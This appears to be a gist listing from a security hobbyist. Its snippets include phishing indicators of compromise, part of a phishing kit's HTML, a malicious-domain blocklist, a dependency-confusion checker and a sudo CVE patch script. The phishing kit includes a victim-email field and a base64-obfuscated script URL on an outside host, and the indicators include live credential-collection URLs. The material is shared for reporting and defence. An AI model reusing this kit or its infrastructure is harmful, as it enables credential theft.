The following portal is using microsoft forms to send out the emails to potential victims. Form URL: https://ncv.microsoft.com/xfzlQmbcLr Portal URL: https://27-02-0-f39h5r8g-wrfgw0e8c3-t0rf7-0wrg-g7.obs.ap-southeast-2.myhuaweicloud.com/vt65g-09we-0t9hng-0w9rmvfj-e09thg-9rjfg9-er.html?AWSAccessKeyId=FQWNSQAJNPZJXV8B91KK&Expires=1677494075&Signature=cBYwgWA9mU%2BlQTS/FMhe6QYGcoE%3D POST location: https://techsmashwru.ru/.cas/next.php
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta charset="UTF-8"> | |
| <script> | |
| let EMAIL_ADDRESS = "user@company.com"; // Change this to the email address | |
| let BASED64_ENCODED_EMAIL = ""; // If you wish to encode the email address, enter the based64 encoded email and leave the email address blank otherwise, leave this field blank | |
| let SCRIPT_LINK_URL = window.atob("aHR0cHM6Ly9tZWdhdGVycmEuaHUvc2NyaXB0LnBocA"); //Enter the script link here |
This is the contents from a phishing attemt I had recieved recently.
IoCs:
Today I had recieved an interesting phishing message via Messenger from a frend, who's also a tech guy so it was suprirpising that he got compromised.
The initial message said:
Is it you in this video? 😱
https://zu7.eu/L3VAD6EzsR
The url loaded from any browser, orther than mobile will redirect to twitch.tv otherwise it would display the following html:
| import requests | |
| import time | |
| import urllib.parse | |
| from bs4 import BeautifulSoup | |
| from selenium import webdriver | |
| from selenium.common.exceptions import NoAlertPresentException | |
| url = "https://xss-game.appspot.com/level1/frame" | |
| response = requests.get(url) | |
| soup = BeautifulSoup(response.text) |
| # Source https://github.com/Esox-Lucius/PiHoleblocklists | |
| 0-800-email.com | |
| 0-aprcredit-card.website | |
| 0-aprcredit-cards.website | |
| 0-aprcreditcard.website | |
| 0-aprcreditcards.website | |
| 0-secure-paypal.com | |
| 0.0.0.0 0-0.028.openvpn.cloud.btcchina.com | |
| 0.0.0.0 0-100-195.btcc.com | |
| 0.0.0.0 0-100-bhd.foxypool.cf |
The following page contains my notes and links about the seminar we had @ Softuni on Vulnerability management in package dependencies at 31st of August 2021.
| #!/bin/env python3 | |
| # https://www.bleepingcomputer.com/news/security/researcher-hacks-over-35-tech-firms-in-novel-supply-chain-attack/ | |
| # The following script finds all package.json files in the current dir and checks if there are referenced any | |
| # dependencies that no public package is available for, making your application vulnerable to supply-chain attack. | |
| # Simply run ./packagejson.py in your root repository direcotory. | |
| import json | |
| import requests | |
| from pathlib import Path | |
| import urllib.parse |
| <?xml version="1.0" encoding="UTF-8"?> | |
| <opml version="1.0"> | |
| <head> | |
| <title>AWS RSS feeds 2019-04-22</title> | |
| </head> | |
| <body> | |
| <outline text="AWS" title="AWS"> | |
| <outline type="rss" text="Infrastructure & Automation" title="Infrastructure & Automation" xmlUrl="https://aws.amazon.com/blogs/infrastructure-and-automation/feed/" htmlUrl="https://aws.amazon.com/blogs/infrastructure-and-automation/"/> | |
| <outline type="rss" text="AWS Developer Blog" title="AWS Developer Blog" xmlUrl="http://feeds.feedburner.com/AwsDeveloperBlog" htmlUrl="https://aws.amazon.com/blogs/developer/"/> |
| #!/bin/bash | |
| # Test and patch CVE-2021-3156 | |
| patch() { | |
| # Simple method to patch with yum | apt | |
| if command -v apt-get >/dev/null; then | |
| sudo apt-get update | |
| sudo apt-get install $1 | |
| elif command -v yum >/dev/null; then | |
| sudo yum updateinfo $1 |